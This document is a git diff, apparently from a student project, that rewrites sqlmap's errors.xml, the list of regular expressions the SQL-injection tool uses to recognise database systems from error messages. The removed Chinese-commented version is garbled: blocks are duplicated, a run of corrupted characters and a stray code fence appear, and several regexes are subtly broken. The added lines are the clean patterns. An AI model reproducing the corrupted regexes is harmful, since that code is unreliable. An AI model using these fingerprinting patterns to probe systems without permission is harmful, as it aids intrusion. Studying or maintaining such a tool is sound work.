1

改
beautifulsoup
308 changed files with 8135 additions and 12748 deletions
--- a/doc/sqlmap-泛读报告.docx
+++ b/doc/sqlmap-泛读报告.docx
--- a/src/sqlmap-master/data/xml/errors.xml
+++ b/src/sqlmap-master/data/xml/errors.xml
@ -1,357 +1,240 @@
-<?xml version="1.0" encoding="UTF-8"?>  <!-- 声明XML文档的版本和编码方式 -->
-
-<root>  <!-- 定义XML文档的根元素 -->
-    <dbms value="MySQL">  <!-- 定义MySQL数据库管理系统 -->
-        <error regexp="SQL syntax.*?MySQL"/>  <!-- 匹配MySQL语法错误的错误信息 -->
-        <error regexp="Warning.*?\Wmysqli?_"/>  <!-- 匹配MySQLi扩展的警告信息 -->
-        <error regexp="MySQLSyntaxErrorException"/>  <!-- 匹配MySQL语法异常的错误信息 -->
-        <error regexp="valid MySQL result"/>  <!-- 匹配无效的MySQL查询结果的错误信息 -->
-        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>  <!-- 匹配与MySQL服务器版本不匹配的错误信息 -->
-        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>  <!-- 匹配与MariaDB服务器版本不匹配的错误信息 -->
-        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>  <!-- 匹配与Drizzle服务器版本不匹配的错误信息 -->
-        <error regexp="Unknown column '[^ ]+' in 'field list'"/>  <!-- 匹配未知列名的错误信息 -->
-        <error regexp="MySqlClient\."/>  <!-- 匹配MySqlClient相关的错误信息 -->
-        <error regexp="com\.mysql\.jdbc"/>  <!-- 匹配MySQL JDBC驱动的错误信息 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>  <!-- 匹配Zend框架中MySQLi相关的异常信息 -->
-        <error regexp="Pdo[./_\\]Mysql"/>  <!-- 匹配PDO MySQL驱动的错误信息 -->
-        <error regexp="MySqlException"/>  <!-- 匹配MySQL异常的错误信息 -->
-        <error regexp="SQLSTATE$\d+$: Syntax error or access violation"/>  <!-- 匹配SQL语法错误或访问违规的错误信息 -->
-        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息 -->
-        <error regexp="is not supported by MemSQL" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息 -->
-        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的嵌套标量子查询的错误信息 -->
-    </dbms>
-
-    <dbms value="PostgreSQL">  <!-- 定义PostgreSQL数据库管理系统 -->
-        <error regexp="PostgreSQL.*?ERROR"/>  <!-- 匹配PostgreSQL错误信息 -->
-        <error regexp="Warning.*?\Wpg_"/>  <!-- 匹配PostgreSQL扩展的警告信息 -->
-        <error regexp="valid PostgreSQL result"/>  <!-- 匹配无效的PostgreSQL查询结果的错误信息 -->
-        <error regexp="Npgsql\."/>  <!-- 匹配Npgsql驱动的错误信息 -->
-        <error regexp="PG::SyntaxError:"/>  <!-- 匹配PostgreSQL语法错误信息 -->
-        <error regexp="org\.postgresql\.util\.PSQLException"/>  <!-- 匹配PostgreSQL JDBC驱动的异常信息 -->
-        <error regexp="ERROR:\s\ssyntax error at or near"/>  <!-- 匹配PostgreSQL语法错误信息 -->
-        <error regexp="ERROR: parser: parse error at or near"/>  <!-- 匹配PostgreSQL解析错误信息 -->
-        <error regexp="PostgreSQL query failed"/>  <!-- 匹配PostgreSQL查询失败的错误信息 -->
-        <error regexp="org\.postgresql\.jdbc"/>  <!-- 匹配PostgreSQL JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\]Pgsql"/>  <!-- 匹配PDO PostgreSQL驱动的错误信息 -->
-        <error regexp="PSQLException"/>  <!-- 匹配PostgreSQL异常的错误信息 -->
-    </dbms>
-
-    <dbms value="Microsoft SQL Server">  <!-- 定义Microsoft SQL Server数据库管理系统 -->
-        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>  <!-- 匹配SQL Server驱动的错误信息 -->
-        <error regexp="OLE DB.*? SQL Server"/>  <!-- 匹配OLE DB SQL Server驱动的错误信息 -->
-        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>  <!-- 匹配SQL Server驱动的错误信息 -->
-        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>  <!-- 匹配SQL Server扩展的警告信息 -->
-        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server驱动的错误信息 -->
-        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>  <!-- 匹配SQL Server .NET驱动的异常信息 -->
-        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>  <!-- 匹配Roadhouse CMS相关的异常信息 -->
-        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server Native Client的错误信息 -->
-        <error regexp="$SQL Server$"/>  <!-- 匹配SQL Server的错误信息 -->
-        <error regexp="ODBC SQL Server Driver"/>  <!-- 匹配ODBC SQL Server驱动的错误信息 -->
-        <error regexp="ODBC Driver \d+ for SQL Server"/>  <!-- 匹配ODBC SQL Server驱动的错误信息 -->
-        <error regexp="SQLServer JDBC Driver"/>  <!-- 匹配SQL Server JDBC驱动的错误信息 -->
-        <error regexp="com\.jnetdirect\.jsql"/>  <!-- 匹配JNetDirect SQL Server驱动的错误信息 -->
-        <error regexp="macromedia\.jdbc\.sqlserver"/>  <!-- 匹配Macromedia SQL Server驱动的错误信息 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>  <!-- 匹配Zend框架中SQL Server相关的异常信息 -->
-        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>  <!-- 匹配Microsoft SQL Server JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>  <!-- 匹配PDO SQL Server驱动的错误信息 -->
-        <error regexp="SQL(Srv|Server)Exception"/>  <!-- 匹配SQL Server异常的错误信息 -->
-        <error regexp="Unclosed quotation mark after the character string"/>  <!-- 匹配未闭合的引号的错误信息 -->
-    </dbms>
-
-<?xml version="1.0" encoding="UTF-8"?>  <!-- 声明XML文档的版本为1.0，编码方式为UTF-8 -->
-
-<root>  <!-- 定义XML文档的根元素，所有内容都包含在此标签内 -->
-    <dbms value="MySQL">  <!-- 定义MySQL数据库管理系统，value属性指定数据库类型为MySQL -->
-        <error regexp="SQL syntax.*?MySQL"/>  <!-- 匹配包含“SQL syntax”和“MySQL”的错误信息，用于识别MySQL语法错误 -->
-        <error regexp="Warning.*?\Wmysqli?_"/>  <!-- 匹配包含“Warning”和“mysqli”或“mysql”的警告信息，用于识别MySQL扩展的警告 -->
-        <error regexp="MySQLSyntaxErrorException"/>  <!-- 匹配MySQL语法异常的错误信息，用于识别MySQL语法错误 -->
-        <error regexp="valid MySQL result"/>  <!-- 匹配无效的MySQL查询结果的错误信息，用于识别查询结果无效的情况 -->
-        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>  <!-- 匹配与MySQL服务器版本不匹配的错误信息，提示用户检查手册 -->
-        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>  <!-- 匹配与MariaDB服务器版本不匹配的错误信息，fork属性指定为MariaDB -->
-        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>  <!-- 匹配与Drizzle服务器版本不匹配的错误信息，fork属性指定为Drizzle -->
-        <error regexp="Unknown column '[^ ]+' in 'field list'"/>  <!-- 匹配未知列名的错误信息，用于识别字段列表中不存在的列 -->
-        <error regexp="MySqlClient\."/>  <!-- 匹配MySqlClient相关的错误信息，用于识别MySqlClient驱动的错误 -->
-        <error regexp="com\.mysql\.jdbc"/>  <!-- 匹配MySQL JDBC驱动的错误信息，用于识别JDBC相关的错误 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>  <!-- 匹配Zend框架中MySQLi相关的异常信息，用于识别Zend框架中的MySQLi错误 -->
-        <error regexp="Pdo[./_\\]Mysql"/>  <!-- 匹配PDO MySQL驱动的错误信息，用于识别PDO驱动的错误 -->
-        <error regexp="MySqlException"/>  <!-- 匹配MySQL异常的错误信息，用于识别MySQL相关的异常 -->
-        <error regexp="SQLSTATE$\d+$: Syntax error or access violation"/>  <!-- 匹配SQL语法错误或访问违规的错误信息，用于识别SQLSTATE错误 -->
-        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息，fork属性指定为MemSQL -->
-        <error regexp="is not supported by MemSQL" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息，fork属性指定为MemSQL -->
-        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的嵌套标量子查询的错误信息，fork属性指定为MemSQL -->
-    </dbms>
-
-    <dbms value="PostgreSQL">  <!-- 定义PostgreSQL数据库管理系统，value属性指定数据库类型为PostgreSQL -->
-        <error regexp="PostgreSQL.*?ERROR"/>  <!-- 匹配包含“PostgreSQL”和“ERROR”的错误信息，用于识别PostgreSQL错误 -->
-        <error regexp="Warning.*?\Wpg_"/>  <!-- 匹配包含“Warning”和“pg_”的警告信息，用于识别PostgreSQL扩展的警告 -->
-        <error regexp="valid PostgreSQL result"/>  <!-- 匹配无效的PostgreSQL查询结果的错误信息，用于识别查询结果无效的情况 -->
-        <error regexp="Npgsql\."/>  <!-- 匹配Npgsql驱动的错误信息，用于识别Npgsql驱动的错误 -->
-        <error regexp="PG::SyntaxError:"/>  <!-- 匹配PostgreSQL语法错误信息，用于识别语法错误 -->
-        <error regexp="org\.postgresql\.util\.PSQLException"/>  <!-- 匹配PostgreSQL JDBC驱动的异常信息，用于识别JDBC相关的错误 -->
-        <error regexp="ERROR:\s\ssyntax error at or near"/>  <!-- 匹配PostgreSQL语法错误信息，用于识别语法错误 -->
-        <error regexp="ERROR: parser: parse error at or near"/>  <!-- 匹配PostgreSQL解析错误信息，用于识别解析错误 -->
-        <error regexp="PostgreSQL query failed"/>  <!-- 匹配PostgreSQL查询失败的错误信息，用于识别查询失败的情况 -->
-        <error regexp="org\.postgresql\.jdbc"/>  <!-- 匹配PostgreSQL JDBC驱动的错误信息，用于识别JDBC相关的错误 -->
-        <error regexp="Pdo[./_\\]Pgsql"/>  <!-- 匹配PDO PostgreSQL驱动的错误信息，用于识别PDO驱动的错误 -->
-        <error regexp="PSQLException"/>  <!-- 匹配PostgreSQL异常的错误信息，用于识别PostgreSQL相关的异常 -->
-    </dbms>
-
-    <dbms value="Microsoft SQL Server">  <!-- 定义Microsoft SQL Server数据库管理系统，value属性指定数据库类型为SQL Server -->
-        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>  <!-- 匹配包含“Driver”和“SQL Server”的错误信息，用于识别SQL Server驱动的错误 -->
-        <error regexp="OLE DB.*? SQL Server"/>  <!-- 匹配包含“OLE DB”和“SQL Server”的错误信息，用于识别OLE DB驱动的错误 -->
-        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>  <!-- 匹配SQL Server驱动的错误信息，用于识别驱动相关的错误 -->
-        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>  <!-- 匹配包含“Warning”和“mssql”或“sqlsrv”的警告信息，用于识别SQL Server扩展的警告 -->
-        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server驱动的错误信息，用于识别驱动相关的错误 -->
-        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>  <!-- 匹配SQL Server .NET驱动的异常信息，用于识别.NET驱动的错误 -->
-        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>  <!-- 匹配Roadhouse CMS相关的异常信息，用于识别CMS相关的错误 -->
-        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server Native Client的错误信息，用于识别Native Client的错误 -->
-        <error regexp="$SQL Server$"/>  <!-- 匹配SQL Server的错误信息，用于识别SQL Server相关的错误 -->
-        <error regexp="ODBC SQL Server Driver"/>  <!-- 匹配ODBC SQL Server驱动的错误信息，用于识别ODBC驱动的错误 -->
-        <error regexp="ODBC Driver \d+ for SQL Server"/>  <!-- 匹配ODBC SQL Server驱动的错误信息，用于识别ODBC驱动的错误 -->
-        <error regexp="SQLServer JDBC Driver"/>  <!-- 匹配SQL Server JDBC驱动的错误信息，用于识别JDBC驱动的错误 -->
-        <error regexp="com\.jnetdirect\.jsql"/>  <!-- 匹配JNetDirect SQL Server驱动的错误信息，用于识别JNetDirect驱动的错误 -->
-        <error regexp="macromedia\.jdbc\.sqlserver"/>  <!-- 匹配Macromedia SQL Server驱动的错误信息，用于识别Macromedia驱动的错误 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>  <!-- 匹配Zend框架中SQL Server相关的异常信息，用于识别Zend框架中的SQL Server错误 -->
-        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>  <!-- 匹配Microsoft SQL Server JDBC驱动的错误信息，用于识别JDBC驱动的错误 -->
-        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>  <!-- 匹配PDO SQL Server驱动的错误信息，用于识别PDO驱动的错误 -->
-        <error regexp="SQL(Srv|Server)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-
-```xml
-<root>  <!-- 定义XML文档的根元素 -->
-    <dbms value="Microsoft Access">  <!-- 定义Microsoft Access数据库管理系统 -->
-        <error regexp="Microsoft Access (\d+ )?Driver"/>  <!-- 匹配Microsoft Access驱动的错误信息 -->
-        <error regexp="JET Database Engine"/>  <!-- 匹配JET数据库引擎的错误信息 -->
-        <error regexp="Access Database Engine"/>  <!-- 匹配Access数据库引擎的错误信息 -->
-        <error regexp="ODBC Microsoft Access"/>  <!-- 匹配ODBC Microsoft Access驱动的错误信息 -->
-        <error regexp="Syntax error $missing operator$ in query expression"/>  <!-- 匹配查询表达式中的缺失操作符的语法错误 -->
-    </dbms>
-
-    <dbms value="Oracle">  <!-- 定义Oracle数据库管理系统 -->
-        <error regexp="\bORA-\d{5}"/>  <!-- 匹配ORA错误代码，后跟五位数字 -->
-        <error regexp="Oracle error"/>  <!-- 匹配通用的Oracle错误信息 -->
-        <error regexp="Oracle.*?Driver"/>  <!-- 匹配与Oracle相关的驱动错误信息 -->
-        <error regexp="Warning.*?\W(oci|ora)_"/>  <!-- 匹配OCI或ORA相关的警告信息 -->
-        <error regexp="quoted string not properly terminated"/>  <!-- 匹配未正确终止的引号字符串的错误信息 -->
-        <error regexp="SQL command not properly ended"/>  <!-- 匹配未正确结束的SQL命令错误信息 -->
-        <error regexp="macromedia\.jdbc\.oracle"/>  <!-- 匹配Macromedia Oracle JDBC驱动的错误信息 -->
-        <error regexp="oracle\.jdbc"/>  <!-- 匹配Oracle JDBC驱动的错误信息 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>  <!-- 匹配Zend框架中Oracle相关的异常信息 -->
-        <error regexp="Pdo[./_\\](Oracle|OCI)"/>  <!-- 匹配PDO Oracle或OCI驱动的错误信息 -->
-        <error regexp="OracleException"/>  <!-- 匹配Oracle异常的错误信息 -->
-    </dbms>
-
-    <dbms value="IBM DB2">  <!-- 定义IBM DB2数据库管理系统 -->
-        <error regexp="CLI Driver.*?DB2"/>  <!-- 匹配DB2 CLI驱动的错误信息 -->
-        <error regexp="DB2 SQL error"/>  <!-- 匹配DB2 SQL错误的通用错误信息 -->
-        <error regexp="\bdb2_\w+\(}/>  <!-- 匹配DB2相关函数调用的错误信息 -->
-        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>  <!-- 匹配包含SQLCODE和SQLSTATE的错误信息 -->
-        <error regexp="com\.ibm\.db2\.jcc"/>  <!-- 匹配IBM DB2 JCC驱动的错误信息 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>  <!-- 匹配Zend框架中DB2相关的异常信息 -->
-        <error regexp="Pdo[./_\\]Ibm"/>  <!-- 匹配PDO IBM DB2驱动的错误信息 -->
-        <error regexp="DB2Exception"/>  <!-- 匹配DB2异常的错误信息 -->
-        <error regexp="ibm_db_dbi\.ProgrammingError"/>  <!-- 匹配ibm_db_dbi中的编程错误信息 -->
-    </dbms>
-
-    <dbms value="Informix">  <!-- 定义Informix数据库管理系统 -->
-        <error regexp="Warning.*?\Wifx_"/>  <!-- 匹配Informix扩展相关的警告信息 -->
-        <error regexp="Exception.*?Informix"/>  <!-- 匹配Informix相关的异常信息 -->
-        <error regexp="Informix ODBC Driver"/>  <!-- 匹配Informix ODBC驱动的错误信息 -->
-        <error regexp="ODBC Informix driver"/>  <!-- 匹配ODBC Informix驱动的错误信息 -->
-        <error regexp="com\.informix\.jdbc"/>  <!-- 匹配Informix JDBC驱动的错误信息 -->
-        <error regexp="weblogic\.jdbc\.informix"/>  <!-- 匹配WebLogic中Informix JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\]Informix"/>  <!-- 匹配PDO Informix驱动的错误信息 -->
-        <error regexp="IfxException"/>  <!-- 匹配Informix异常的错误信息 -->
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <dbms value="MySQL">
+        <error regexp="SQL syntax.*?MySQL"/>
+        <error regexp="Warning.*?\Wmysqli?_"/>
+        <error regexp="MySQLSyntaxErrorException"/>
+        <error regexp="valid MySQL result"/>
+        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
+        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
+        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>
+        <error regexp="Unknown column '[^ ]+' in 'field list'"/>
+        <error regexp="MySqlClient\."/>
+        <error regexp="com\.mysql\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>
+        <error regexp="Pdo[./_\\]Mysql"/>
+        <error regexp="MySqlException"/>
+        <error regexp="SQLSTATE\[\d+\]: Syntax error or access violation"/>
+        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>
+        <error regexp="is not supported by MemSQL" fork="MemSQL"/>
+        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>
+    </dbms>
+
+    <dbms value="PostgreSQL">
+        <error regexp="PostgreSQL.*?ERROR"/>
+        <error regexp="Warning.*?\Wpg_"/>
+        <error regexp="valid PostgreSQL result"/>
+        <error regexp="Npgsql\."/>
+        <error regexp="PG::SyntaxError:"/>
+        <error regexp="org\.postgresql\.util\.PSQLException"/>
+        <error regexp="ERROR:\s\ssyntax error at or near"/>
+        <error regexp="ERROR: parser: parse error at or near"/>
+        <error regexp="PostgreSQL query failed"/>
+        <error regexp="org\.postgresql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Pgsql"/>
+        <error regexp="PSQLException"/>
+    </dbms>
+
+    <dbms value="Microsoft SQL Server">
+        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
+        <error regexp="OLE DB.*? SQL Server"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>
+        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>
+        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>
+        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>
+        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
+        <error regexp="\[SQL Server\]"/>
+        <error regexp="ODBC SQL Server Driver"/>
+        <error regexp="ODBC Driver \d+ for SQL Server"/>
+        <error regexp="SQLServer JDBC Driver"/>
+        <error regexp="com\.jnetdirect\.jsql"/>
+        <error regexp="macromedia\.jdbc\.sqlserver"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>
+        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>
+        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>
+        <error regexp="SQL(Srv|Server)Exception"/>
+        <error regexp="Unclosed quotation mark after the character string"/>
+    </dbms>
+
+    <dbms value="Microsoft Access">
+        <error regexp="Microsoft Access (\d+ )?Driver"/>
+        <error regexp="JET Database Engine"/>
+        <error regexp="Access Database Engine"/>
+        <error regexp="ODBC Microsoft Access"/>
+        <error regexp="Syntax error \(missing operator\) in query expression"/>
+    </dbms>
+
+    <dbms value="Oracle">
+        <error regexp="\bORA-\d{5}"/>
+        <error regexp="Oracle error"/>
+        <error regexp="Oracle.*?Driver"/>
+        <error regexp="Warning.*?\W(oci|ora)_"/>
+        <error regexp="quoted string not properly terminated"/>
+        <error regexp="SQL command not properly ended"/>
+        <error regexp="macromedia\.jdbc\.oracle"/>
+        <error regexp="oracle\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>
+        <error regexp="Pdo[./_\\](Oracle|OCI)"/>
+        <error regexp="OracleException"/>
+    </dbms>
+
+    <dbms value="IBM DB2">
+        <error regexp="CLI Driver.*?DB2"/>
+        <error regexp="DB2 SQL error"/>
+        <error regexp="\bdb2_\w+\("/>
+        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>
+        <error regexp="com\.ibm\.db2\.jcc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>
+        <error regexp="Pdo[./_\\]Ibm"/>
+        <error regexp="DB2Exception"/>
+        <error regexp="ibm_db_dbi\.ProgrammingError"/>
+    </dbms>
+
+    <dbms value="Informix">
+        <error regexp="Warning.*?\Wifx_"/>
+        <error regexp="Exception.*?Informix"/>
+        <error regexp="Informix ODBC Driver"/>
+        <error regexp="ODBC Informix driver"/>
+        <error regexp="com\.informix\.jdbc"/>
+        <error regexp="weblogic\.jdbc\.informix"/>
+        <error regexp="Pdo[./_\\]Informix"/>
+        <error regexp="IfxException"/>
    </dbms>

    <!-- Interbase/Firebird -->
-    <dbms value="Firebird">  <!-- 定义Firebird数据库管理系统 -->
-        <error regexp="Dynamic SQL Error"/>  <!-- 匹配动态SQL错误信息 -->
-        <error regexp="Warning.*?\Wibase_"/>  <!-- 匹配Firebird扩展相关的警告信息 -->
-        <error regexp="org\.firebirdsql\.jdbc"/>  <!-- 匹配Firebird SQL JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\]Firebird"/>  <!-- 匹配PDO Firebird驱动的错误信息 -->
+    <dbms value="Firebird">
+        <error regexp="Dynamic SQL Error"/>
+        <error regexp="Warning.*?\Wibase_"/>
+        <error regexp="org\.firebirdsql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Firebird"/>
    </dbms>

-    <dbms value="SQLite">  <!-- 定义SQLite数据库管理系统 -->
-        <error regexp="SQLite/JDBCDriver"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
-        <error regexp="SQLite\.Exception"/>  <!-- 匹配SQLite异常的错误信息 -->
-        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>  <!-- 匹配Microsoft或System Data的SQLite异常信息 -->
-        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>  <!-- 匹配SQLite或SQLite3相关的警告信息 -->
-        <error regexp="$SQLITE_ERROR$"/>  <!-- 匹配SQLite错误信息 -->
-        <error regexp="SQLite error \d+:"/>  <!-- 匹配SQLite错误代码的信息 -->
-        <error regexp="sqlite3.OperationalError:"/>  <!-- 匹配SQLite3操作错误的信息 -->
-        <error regexp="SQLite3::SQLException"/>  <!-- 匹配SQLite3 SQL异常的信息 -->
-        <error regexp="org\.sqlite\.JDBC"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\]Sqlite"/>  <!-- 匹配PDO SQLite驱动的错误信息 -->
-        <error regexp="SQLiteException"/>  <!-- 匹配SQLite异常的错误信息 -->
+    <dbms value="SQLite">
+        <error regexp="SQLite/JDBCDriver"/>
+        <error regexp="SQLite\.Exception"/>
+        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
+        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>
+        <error regexp="\[SQLITE_ERROR\]"/>
+        <error regexp="SQLite error \d+:"/>
+        <error regexp="sqlite3.OperationalError:"/>
+        <error regexp="SQLite3::SQLException"/>
+        <error regexp="org\.sqlite\.JDBC"/>
+        <error regexp="Pdo[./_\\]Sqlite"/>
+        <error regexp="SQLiteException"/>
    </dbms>

-    <dbms value="SAP MaxDB">  <!-- 定义SAP MaxDB数据库管理系统 -->
-        <error regexp="SQL error.*?POS([0-9]+)"/>  <!-- 匹配SAP MaxDB SQL错误的信息，其中包括位置编号 -->
-        <error regexp="Warning.*?\Wmaxdb_"/>  <!-- 匹配MaxDB扩展相关的警告信息 -->
-        <error regexp="DriverSapDB"/>  <!-- 匹配SapDB驱动的错误信息 -->
-        <error regexp="-3014.*?Invalid end of SQL statement"/>  <!-- 匹配无效的SQL语句结束的错误信息 -->
-        <error regexp="com\.sap\.dbtech\.jdbc"/>  <!-- 匹配SAP DBTech JDBC驱动的错误信息 -->
-        <error regexp="$-3008$.*?: Invalid keyword or missing delimiter"/>  <!-- 匹配无效关键字或缺失分隔符的错误信息 -->
+    <dbms value="SAP MaxDB">
+        <error regexp="SQL error.*?POS([0-9]+)"/>
+        <error regexp="Warning.*?\Wmaxdb_"/>
+        <error regexp="DriverSapDB"/>
+        <error regexp="-3014.*?Invalid end of SQL statement"/>
+        <error regexp="com\.sap\.dbtech\.jdbc"/>
+        <error regexp="\[-3008\].*?: Invalid keyword or missing delimiter"/>
    </dbms>

-    <dbms value="Sybase">  <!-- 定义Sybase数据库管理系统 -->
-        <error regexp="Warning.*?\Wsybase_"/>  <!-- 匹配Sybase扩展相关的警告信息 -->
-        <error regexp="Sybase message"/>  <!-- 匹配Sybase消息的错误信息 -->
-        <error regexp="Sybase.*?Server message"/>  <!-- 匹配Sybase服务器消息的错误信息 -->
-        <error regexp="SybSQLException"/>  <!-- 匹配Sybase异常的错误信息 -->
-        <error regexp="Sybase\.Data\.AseClient"/>  <!-- 匹配Sybase .NET AseClient的错误信息 -->
-        <error regexp="com\.sybase\.jdbc"/>  <!-- 匹配Sybase JDBC驱动的错误信息 -->
+    <dbms value="Sybase">
+        <error regexp="Warning.*?\Wsybase_"/>
+        <error regexp="Sybase message"/>
+        <error regexp="Sybase.*?Server message"/>
+        <error regexp="SybSQLException"/>
+        <error regexp="Sybase\.Data\.AseClient"/>
+        <error regexp="com\.sybase\.jdbc"/>
    </dbms>

-    <dbms value="Ingres">  <!-- 定义Ingres数据库管理系统 -->
-        <error regexp="Warning.*?\Wingres_"/>  <!-- 匹配Ingres扩展相关的警告信息 -->
-        <error regexp="Ingres SQLSTATE"/>  <!-- 匹配Ingres SQLSTATE错误的信息 -->
-        <error regexp="Ingres\W.*?Driver"/>  <!-- 匹配Ingres驱动的错误信息 -->
-        <error regexp="com\.ingres\.gcf\.jdbc"/>  <!-- 匹配Ingres GCF JDBC驱动的错误信息 -->
+    <dbms value="Ingres">
+        <error regexp="Warning.*?\Wingres_"/>
+        <error regexp="Ingres SQLSTATE"/>
+        <error regexp="Ingres\W.*?Driver"/>
+        <error regexp="com\.ingres\.gcf\.jdbc"/>
    </dbms>

-    <dbms value="FrontBase">  <!-- 定义FrontBase数据库管理系统 -->
-        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>  <!-- 匹配回滚事务的异常信息 -->
-        <error regexp="com\.frontbase\.jdbc"/>  <!-- 匹配FrontBase JDBC驱动的错误信息 -->
-        <error regexp="Syntax error 1. Missing"/>  <!-- 匹配语法错误的信息，缺失某部分内容 -->
-        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>  <!-- 匹配语义或语法错误，后跟一个特定的错误码 -->
+    <dbms value="FrontBase">
+        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>
+        <error regexp="com\.frontbase\.jdbc"/>
+        <error regexp="Syntax error 1. Missing"/>
+        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>
    </dbms>

-    <dbms value="HSQLDB">  <!-- 定义HSQLDB数据库管理系统 -->
-        <error regexp="Unexpected end of command in statement $"/>  <!-- 匹配SQL语句意外结束的错误信息 -->
-        <error regexp="Unexpected token.*?in statement \["/>  <!-- 匹配SQL语句中意外标记的错误信息 -->
-        <error regexp="org\.hsqldb\.jdbc"/>  <!-- 匹配HSQLDB JDBC驱动的错误信息 -->
+    <dbms value="HSQLDB">
+        <error regexp="Unexpected end of command in statement \["/>
+        <error regexp="Unexpected token.*?in statement \["/>
+        <error regexp="org\.hsqldb\.jdbc"/>
    </dbms>

-    <dbms value="H2">  <!-- 定义H2数据库管理系统 -->
-        <error regexp="org\.h2\.jdbc"/>  <!-- 匹配H2 JDBC驱动的错误信息 -->
-        <error regexp="\[42000-192$"/>  <!-- 匹配H2特定错误代码的信息 -->
+    <dbms value="H2">
+        <error regexp="org\.h2\.jdbc"/>
+        <error regexp="\[42000-192\]"/>
    </dbms>

-    <dbms value="MonetDB">  <!-- 定义MonetDB数据库管理系统 -->
-        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>  <!-- 匹配包含MonetDB特定错误前缀的错误信息 -->
-        <error regexp="$MonetDB$\[ODBC Driver"/>  <!-- 匹配MonetDB ODBC驱动的错误信息 -->
-        <error regexp="nl\.cwi\.monetdb\.jdbc"/>  <!-- 匹配MonetDB JDBC驱动的错误信息 -->
+    <dbms value="MonetDB">
+        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>
+        <error regexp="\[MonetDB\]\[ODBC Driver"/>
